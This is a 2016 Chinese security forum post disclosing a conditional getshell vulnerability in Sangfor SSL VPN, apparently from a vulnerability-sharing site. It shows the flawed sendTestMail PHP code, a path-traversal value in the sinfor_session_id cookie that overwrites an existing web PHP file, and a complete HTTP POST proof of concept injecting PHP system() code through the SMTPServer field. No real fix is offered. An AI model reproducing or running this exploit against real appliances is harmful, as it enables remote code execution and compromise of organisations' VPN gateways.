HanDs
管理员

[7月漏洞公开] 深信服SSL VPN getshell漏洞(有条件限制) 



来一发

详细说明:

这里为了保护厂商知识产权,隐去大部分代码

漏洞利用前提:

1、有登陆SSL VPN控制台的权限

2、可以SSL VPN修改邮件服务器配置



问题出在sysCfgController.class.php 147行(邮件服务器设置的发送测试邮件功能)

code 区域
public function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr=0, $EmailUser='', $EmailPassword='',$EmailFrom='',$LanguageType='zh_CN')
{
// 写入临时配置文件
$conf_file = '/tmp/testmail_'.$_COOKIE['sinfor_session_id'];
$contents = "[MAIL]\n";
$contents .= "EnableEmailNotice = \"1\"\n";
$contents .= "SMTPServer = \"$SMTPServer\"\n";
$contents .= "SMTPPort = \"$SMTPPort\"\n";
$contents .= "EnableCheckUsr = \"$EnableCheckUsr\"\n";
$contents .= "EmailUser = \"$EmailUser\"\n";
$contents .= "EmailPassword = \"$EmailPassword\"\n";
$contents .= "EmailFrom = \"$EmailFrom\"\n";
$contents .= "DestAddr = \"$DestAddr\"\n";
$contents .= "EmailTitle = \"$EmailTitle\"\n";
$contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
@file_put_contents($conf_file, $contents);
if (!file_exists($conf_file))
throw new FileException($conf_file);





file_put_contents在file_exists前执行,而$conf_file来源于cookie参数sinfor_session_id

那么我们提交的时候修改cookie sinfor_session_id为:

code 区域
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt



即可在/tmp/目录下创建一个1.txt文件

如何getshell呢?向web根目录下写个php就行了呀

但这里会碰到问题:新建的文件权限是-rw-------,也就是说web容器不能执行新建的文件

为了突破这个问题,需要覆盖掉一个已存在的php文件,利用其x权限来达到getshell的目的

就拿这个php开刀吧:/app/usr/sbin/webui/html/appSsoApi.php

那么将cookie sinfor_session_id修改为:

code 区域
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php



注意!此操作会覆盖上面的php文件



最终POC:

code 区域
POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=SysCfg&action=sendTestMail&token=72c791a93959bf388db3af864c09bbee82f2d1a8 

HTTP/1.1
Accept: */*
Accept-Language: zh-CN
Referer: https://***/html/tpl/mailMgt.html
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: ***
Content-Length: 122
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: language=zh_CN; USER_CUSTOM_SETTING=1460011919; SESSID=C42EC5FBB05DCD23B13A3384C98E065DC8271CA9AC1B4F433557BC8C4FBC312; x-anti-csrf-

gcs=72DFC30A00E3FB9E; sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php;

PHPSESSID=870a66816ba987171730e9b80753da82; x-act-flag-gcs=; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%2238%22%2C%22recflag%22%3A0%2C

%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag

%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C

%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D

SMTPServer=<?php system(id);?>&SMTPPort=1&EmailUser=&EmailPassword=&EmailFrom=1&LanguageType=zh_CN&DestAddr=1&EmailTitle=1





提交后访问https://***/cgi-bin/php-cgi/html/appSsoApi.php,可看到php代码执行:

1.png

漏洞证明:

1.png

修复方案:

你懂的


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
深信
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复